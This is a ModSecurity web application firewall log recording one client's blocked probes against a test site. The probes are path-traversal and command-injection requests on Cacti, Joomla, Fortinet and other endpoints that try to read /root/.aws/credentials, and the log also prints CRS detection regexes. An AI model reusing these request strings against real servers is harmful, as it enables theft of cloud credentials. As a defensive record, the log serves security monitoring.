[Tue May 06 14:10:25.405601 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aBn8MQkYV-vARAMMZzPByAAAAAU"]
[Tue May 06 14:10:34.902296 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat%20../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aBn8OgkYV-vARAMMZzPBzAAAAAU"]
[Tue May 06 14:10:34.902376 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat%20../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aBn8OgkYV-vARAMMZzPBzAAAAAU"]
[Tue May 06 14:10:34.902415 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat ../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aBn8OgkYV-vARAMMZzPBzAAAAAU"]
[Tue May 06 14:10:34.902452 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1 cat ../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aBn8OgkYV-vARAMMZzPBzAAAAAU"]
[Tue May 06 14:10:34.902598 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:l[\\\\\\\\'\\"]* ..." at ARGS:local_data_id. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "123"] [id "932100"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: ;cat ../../../../../../../root/.aws/credentials found within ARGS:local_data_id: 1;cat ../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aBn8OgkYV-vARAMMZzPBzAAAAAU"]
[Tue May 06 14:10:34.903205 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aBn8OgkYV-vARAMMZzPBzAAAAAU"]
[Tue May 06 14:10:34.903401 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 25, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aBn8OgkYV-vARAMMZzPBzAAAAAU"]
[Tue May 06 14:10:36.456433 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aBn8PAkYV-vARAMMZzPBzQAAAAU"]
[Tue May 06 14:10:36.456643 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aBn8PAkYV-vARAMMZzPBzQAAAAU"]
[Tue May 06 14:10:36.456813 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aBn8PAkYV-vARAMMZzPBzQAAAAU"]
[Tue May 06 14:10:37.751410 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /index.php?option=com_media&view=mediaList&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aBn8PQkYV-vARAMMZzPBzgAAAAU"]
[Tue May 06 14:10:37.751491 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?option=com_media&view=mediaList&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aBn8PQkYV-vARAMMZzPBzgAAAAU"]
[Tue May 06 14:10:37.751534 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?option=com_media&view=medialist&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aBn8PQkYV-vARAMMZzPBzgAAAAU"]
[Tue May 06 14:10:37.752818 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aBn8PQkYV-vARAMMZzPBzgAAAAU"]
[Tue May 06 14:10:37.753004 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aBn8PQkYV-vARAMMZzPBzgAAAAU"]
[Tue May 06 14:10:38.849121 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aBn8PgkYV-vARAMMZzPBzwAAAAU"]
[Tue May 06 14:10:38.849197 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aBn8PgkYV-vARAMMZzPBzwAAAAU"]
[Tue May 06 14:10:38.849232 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aBn8PgkYV-vARAMMZzPBzwAAAAU"]
[Tue May 06 14:10:38.849656 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aBn8PgkYV-vARAMMZzPBzwAAAAU"]
[Tue May 06 14:10:38.849857 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aBn8PgkYV-vARAMMZzPBzwAAAAU"]
[Tue May 06 14:10:49.687853 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aBn8SaLEXg5QrJj263MM3gAAAAc"]
[Tue May 06 14:10:49.688786 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aBn8SaLEXg5QrJj263MM3gAAAAc"]
[Tue May 06 14:10:49.688830 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aBn8SaLEXg5QrJj263MM3gAAAAc"]
[Tue May 06 14:10:49.689299 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aBn8SaLEXg5QrJj263MM3gAAAAc"]
[Tue May 06 14:10:49.689490 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aBn8SaLEXg5QrJj263MM3gAAAAc"]
[Tue May 06 14:10:50.648818 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aBn8SqLEXg5QrJj263MM3wAAAAc"]
[Tue May 06 14:10:50.648890 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aBn8SqLEXg5QrJj263MM3wAAAAc"]
[Tue May 06 14:10:50.648928 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aBn8SqLEXg5QrJj263MM3wAAAAc"]
[Tue May 06 14:10:50.649352 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aBn8SqLEXg5QrJj263MM3wAAAAc"]
[Tue May 06 14:10:50.649533 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aBn8SqLEXg5QrJj263MM3wAAAAc"]
[Tue May 06 14:10:51.581170 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aBn8S6LEXg5QrJj263MM4AAAAAc"]
[Tue May 06 14:10:51.581377 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aBn8S6LEXg5QrJj263MM4AAAAAc"]
